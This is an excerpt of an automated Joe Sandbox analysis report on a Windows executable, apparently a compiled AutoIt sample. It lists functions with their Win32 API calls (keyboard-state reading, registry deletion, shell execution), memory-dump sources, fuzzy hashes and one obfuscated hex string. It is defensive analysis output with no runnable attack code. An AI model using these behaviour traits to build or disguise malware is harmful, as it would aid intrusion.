                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00466DE0,00000018,003E5E7B,?,00000000,00000109), ref: 003DAA0C
                                                                                • EnterCriticalSection.KERNEL32(8000000C,00466DE0,00000018,003E5E7B,?,00000000,00000109), ref: 003DAA29
                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 003DAA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1422805418-0
                                                                                • Opcode ID: 9adf906d10f6e2e3747e4e07160145ecf07b868f1f24b1da7e31443ee82fd6ce
                                                                                • Instruction ID: 8ec958254a01d2d318d6ddffe1c6cd8bb44bebb14603198da903a1f5d6214815
                                                                                • Opcode Fuzzy Hash: 9adf906d10f6e2e3747e4e07160145ecf07b868f1f24b1da7e31443ee82fd6ce
                                                                                • Instruction Fuzzy Hash: 084136B3901A059BEB118F68EB41799B7B0AF01324F21832BE529AB3D1D7749C41CB86
                                                                                Function 00418ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00418EE4
                                                                                • GetDC.USER32(00000000), ref: 00418EEC
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00418EF7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00418F03
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00418F3F
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00418F50
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0041BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00418F8A
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00418FAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 2a64321c9f0cf32092f90ab941d6ffc2d0c20d43fffffbf2990de18223362795
                                                                                • Instruction ID: 2e3920c925ca59269da0123b86e3898c68f7682ec307cc5ab0424efc4666e234
                                                                                • Opcode Fuzzy Hash: 2a64321c9f0cf32092f90ab941d6ffc2d0c20d43fffffbf2990de18223362795
                                                                                • Instruction Fuzzy Hash: A3318072600614BFEB108F50DC4AFEB3BADEF49715F045065FE09DA291C6799842CB78
                                                                                Function 00420133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0042016D
                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0042038D
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004203AB
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 004203D6
                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004203FF
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00420421
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00420440
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                • String ID:
                                                                                • API String ID: 3356174886-0
                                                                                • Opcode ID: 2e8290a91f3e16351f53736aaac25ee3c832a263467958537427d215bf17ca95
                                                                                • Instruction ID: ba40269e98802ec6e450fd1875d29861f2e0e0d8225706d5cc5e9d57d295fcdd
                                                                                • Opcode Fuzzy Hash: 2e8290a91f3e16351f53736aaac25ee3c832a263467958537427d215bf17ca95
                                                                                • Instruction Fuzzy Hash: BEA1AD35700626EFDB18CF68D9897AEBBF1BF04700F548166EC54A6291D738AD60CB94
                                                                                Function 003CAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3cb8a09c010a4f9156c15d8a5cc82c4cde55a20ad8b5ba257cbd422299dbdf2f
                                                                                • Instruction ID: b988e3c41efb8714ca0f68b98eceffde1cc3f42eba6a1223dcb132c674492409
                                                                                • Opcode Fuzzy Hash: 3cb8a09c010a4f9156c15d8a5cc82c4cde55a20ad8b5ba257cbd422299dbdf2f
                                                                                • Instruction Fuzzy Hash: 937167B1900519EFCB05CF98CC89EAEBB78FF85318F24815DF915AA251C734AE11CBA5
                                                                                Function 00412230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0041225A
                                                                                • _memset.LIBCMT ref: 00412323
                                                                                • ShellExecuteExW.SHELL32(?), ref: 00412368
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041242F
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041243E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                • String ID: @
                                                                                • API String ID: 4082843840-2766056989
                                                                                • Opcode ID: 99f033a18791511c926f690122c18f9e96747994a73dd3bf5cc213dcd2904082
                                                                                • Instruction ID: 1d9a2374a62bec075556c9c7b030e83c735bd72f767aa251e03f3ab8a5f31c12
                                                                                • Opcode Fuzzy Hash: 99f033a18791511c926f690122c18f9e96747994a73dd3bf5cc213dcd2904082
                                                                                • Instruction Fuzzy Hash: DE71BF74A006199FCF05EFA4C981AEEB7F5FF08300F00806AE959AB751CB74AD50CB98
                                                                                Function 003F3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 003F3C02
                                                                                • GetKeyboardState.USER32(?), ref: 003F3C17
                                                                                • SetKeyboardState.USER32(?), ref: 003F3C78
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003F3CA4
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003F3CC1
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003F3D05
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003F3D26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 4034769b4798d543c208e8b170e013e0fb17e5bd52cb76f0430d4d4b4b68b963
                                                                                • Instruction ID: 9f7b491891911c02eb9e0376f56a6cca393b322641764777b2cf8f54571074bd
                                                                                • Opcode Fuzzy Hash: 4034769b4798d543c208e8b170e013e0fb17e5bd52cb76f0430d4d4b4b68b963
                                                                                • Instruction Fuzzy Hash: F651F8A05047D93DFB378374CC55BBABF996F06300F088489F2D55A8C2D694EE94E760
                                                                                Function 003CB63C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(000000FF), ref: 003CB64F
                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 003CB691
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 003CB69F
                                                                                Strings
                                                                                • 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 0042DFDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
                                                                                • API String ID: 4210589936-2477213679
                                                                                • Opcode ID: 19bf8a41a131c05d9cb3ddd2efd4e8c934d5bf9cf4963efb64c60fd021ed81e8
                                                                                • Instruction ID: 76b2e57a9ad3b275e425c657dd64ca4b584bcc32bf2a93bfe9d4b1d0a80ffdc2
                                                                                • Opcode Fuzzy Hash: 19bf8a41a131c05d9cb3ddd2efd4e8c934d5bf9cf4963efb64c60fd021ed81e8
                                                                                • Instruction Fuzzy Hash: 76416E35A04115BBCF169F65C845FE9FB74BB05324F20431AE829D6290CB34ADA4DFA9
                                                                                Function 00413D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00413DA1
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00413DCB
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413E80
                                                                                  • Part of subcall function 00413D72: RegCloseKey.ADVAPI32(?), ref: 00413DE8
                                                                                  • Part of subcall function 00413D72: FreeLibrary.KERNEL32(?), ref: 00413E3A
                                                                                  • Part of subcall function 00413D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413E5D
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00413E25
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: 06bced75c5a4700cb148c1d95dd365259666634e11fcfdcccdf88d80c8dae19b
                                                                                • Instruction ID: 8bb4bd37498dd5e1988fbd3db8dbcaf410d6075676ec857373e3a48bf059c6cb
                                                                                • Opcode Fuzzy Hash: 06bced75c5a4700cb148c1d95dd365259666634e11fcfdcccdf88d80c8dae19b
                                                                                • Instruction Fuzzy Hash: BC31EAB1D01209BFDB159F95EC85AFFB7BCEF08315F00016AE512E2250D6749F899BA4
                                                                                Function 00418FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00418FE7
                                                                                • GetWindowLongW.USER32(00F4E0F0,000000F0), ref: 0041901A
                                                                                • GetWindowLongW.USER32(00F4E0F0,000000F0), ref: 0041904F
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00419081
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004190AB
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004190BC
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004190D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 49860d9b6ced88c90483946857408fcfe02c757ed8e057055595372f126b47a1
                                                                                • Instruction ID: ad798a6885acd0c8ee4dca39c4125d73cfa0fe177933bda6911af3f966fd4f34
                                                                                • Opcode Fuzzy Hash: 49860d9b6ced88c90483946857408fcfe02c757ed8e057055595372f126b47a1
                                                                                • Instruction Fuzzy Hash: 9D315734A00214DFDB20CF58DC95FA63BA5FB4A714F14016AF5198B2B2CB75AC80CF49
                                                                                Function 003F08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F08F2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F0918
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 003F091B
                                                                                • SysAllocString.OLEAUT32(?), ref: 003F0939
                                                                                • SysFreeString.OLEAUT32(?), ref: 003F0942
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 003F0967
                                                                                • SysAllocString.OLEAUT32(?), ref: 003F0975
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: daf0318132922e9cd4e99f57ed1fd2cf5883f2c1cb15e15da6217bb005be5312
                                                                                • Instruction ID: 0e80ab434333b7fe13f7accb98f327728fdf4fcaad239c2ee54115a25588a324
                                                                                • Opcode Fuzzy Hash: daf0318132922e9cd4e99f57ed1fd2cf5883f2c1cb15e15da6217bb005be5312
                                                                                • Instruction Fuzzy Hash: A921A97660121DAF9B159F7CDC84DBB73ACEB09360B018125FA15DB162E7B0EC45C764
                                                                                Function 003F2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 1038674560-2734436370
                                                                                • Opcode ID: d5d869372e848abe1d2605b8d1b4fb9f37d1fab1cb8905f0e75801088d60b4d1
                                                                                • Instruction ID: 652b866a0ee30a50e6edd672cb5ab1b4fdf4d9cd7893e0cc2760acf275760ac6
                                                                                • Opcode Fuzzy Hash: d5d869372e848abe1d2605b8d1b4fb9f37d1fab1cb8905f0e75801088d60b4d1
                                                                                • Instruction Fuzzy Hash: 49214C72208115F7D323E6359C12FBBB39CEF66310F20402BF649DB582E6959D41C3A5
                                                                                Function 003F0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F09CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F09F1
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 003F09F4
                                                                                • SysAllocString.OLEAUT32 ref: 003F0A15
                                                                                • SysFreeString.OLEAUT32 ref: 003F0A1E
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 003F0A38
                                                                                • SysAllocString.OLEAUT32(?), ref: 003F0A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 6e8eeb54085ab7143077715e64a7357c7a899b7d9d9beefe3e28dcaf88c0a8dd
                                                                                • Instruction ID: 8b897113d9dee9c1e1de62cb1b4dac87e71860455e5cb990bf213c1aec55c581
                                                                                • Opcode Fuzzy Hash: 6e8eeb54085ab7143077715e64a7357c7a899b7d9d9beefe3e28dcaf88c0a8dd
                                                                                • Instruction Fuzzy Hash: 88214475604208AFDF159FACDC89DBBB7EDEF093607418125FA19CB262E670EC418764
                                                                                Function 0041A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
                                                                                  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
                                                                                  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0041A32D
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0041A33A
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0041A345
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0041A354
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0041A360
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 405d77bbae752a5f4155a589704a7d915e3eb1d838f268367b004ac2ef7d3200
                                                                                • Instruction ID: f5ba4824a1f7617bd17d73607a778676fe7207faa3151d3b4a1ec3d2e7b18616
                                                                                • Opcode Fuzzy Hash: 405d77bbae752a5f4155a589704a7d915e3eb1d838f268367b004ac2ef7d3200
                                                                                • Instruction Fuzzy Hash: 8911D3B110011DBEEF115FA0CC85EE77F6DFF08798F014115BA08A60A0C7769C21DBA8
                                                                                Function 003CCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 003CCCF6
                                                                                • GetWindowRect.USER32(?,?), ref: 003CCD37
                                                                                • ScreenToClient.USER32(?,?), ref: 003CCD5F
                                                                                • GetClientRect.USER32(?,?), ref: 003CCE8C
                                                                                • GetWindowRect.USER32(?,?), ref: 003CCEA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: 8dac00613a7083f240242aa2364aa3525d49367061667cb73a213574fbe348f2
                                                                                • Instruction ID: 6d851a91cd8196d18d474421831edf0d7d502cc5edbe6e893fea9b1543f8c800
                                                                                • Opcode Fuzzy Hash: 8dac00613a7083f240242aa2364aa3525d49367061667cb73a213574fbe348f2
                                                                                • Instruction Fuzzy Hash: 7AB14A79A10249DBDB10CFA9C484BEEB7B1FF08300F14A12AEC59EB650DB34AD51CB58
                                                                                Function 00411BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
